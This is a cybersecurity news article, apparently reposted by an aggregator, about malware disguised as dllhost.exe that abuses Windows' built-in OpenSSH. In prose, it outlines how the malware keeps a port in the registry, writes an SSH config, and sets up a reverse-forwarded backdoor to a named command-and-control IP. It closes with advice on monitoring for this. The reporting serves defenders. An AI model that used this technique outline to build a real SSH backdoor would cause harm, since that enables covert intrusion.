By rssfeeds-admin 
The discovery highlights how legitimate administrative tools can be weaponized by threat actors, transforming essential network utilities into attack vectors that bypass traditional security measures.
Security analyst Xavier Mertens from the Internet Storm Center identified a malicious sample masquerading as “dllhost.exe” that specifically targets Windows systems with OpenSSH installations.
The file, which received an 18/71 detection score on VirusTotal, demonstrates how attackers are adapting their techniques to leverage Microsoft’s decision to include OpenSSH as a default component in Windows 10 version 1803.
The malware represents a concerning evolution in attack methodologies, as SSH clients like PuTTY have been trusted tools for system administrators for years.
However, this trust has been repeatedly exploited, with previous incidents involving trojanized versions of PuTTY being deployed by threat groups like UNC4034.
The integration of OpenSSH into Windows has inadvertently expanded the attack surface, providing malicious actors with new opportunities to abuse legitimate functionality.
SSH Client
The malware employs a multi-stage approach to establish persistence and maintain communication with command-and-control infrastructure.
Initially, it attempts to start an existing “SSHService” service on the target system. If unsuccessful, the malware queries a specific registry key (SOFTWARESSHservice) to retrieve a previously saved random port number from earlier infections.
During first-time execution, the malware generates a random port number and stores it in the registry for future use.
It then creates a malicious SSH configuration file in the Windows temp directory that contains connection details for the attacker’s command-and-control server.
The configuration specifies a remote server at IP address 193.187.174.3, using port 443 for communication and implementing remote port forwarding to establish the backdoor connection.
The malware enters an infinite loop with extended sleep intervals between iterations, periodically launching ssh.exe processes with the crafted configuration file.
This approach allows the malware to maintain persistent access while appearing as legitimate SSH traffic, potentially evading network monitoring systems that might otherwise flag suspicious connections.
Recommendations
The discovery underscores the growing trend of “Living off the Land” attacks, where threat actors abuse legitimate system binaries and tools rather than deploying custom malware.
OpenSSH’s classification as a “LOLBIN” (Living Off the Land Binary) reflects its potential for misuse in unauthorized activities, including data exfiltration through scp.exe and remote access through ssh.exe.
According to the Report, Organizations should implement comprehensive monitoring of OpenSSH usage, particularly focusing on unusual configuration files, unexpected service installations, and suspicious network connections to external IP addresses.
Registry monitoring for the specific keys used by this malware family can provide early detection capabilities.
Additionally, network administrators should establish baseline SSH usage patterns and investigate deviations that might indicate compromise.
The incident demonstrates that even beneficial security improvements, such as Microsoft’s inclusion of OpenSSH in Windows, can introduce new attack vectors that require updated defensive strategies and enhanced monitoring capabilities.
Find this Story Interesting! Follow us on LinkedIn and X to Get More Instant Updates.
The post Hackers Exploit Free SSH Client PuTTY to Deploy Malware on Windows Systems appeared first on Cyber Security News.
Discover more from RSS Feeds Cloud
Subscribe to get the latest posts sent to your email.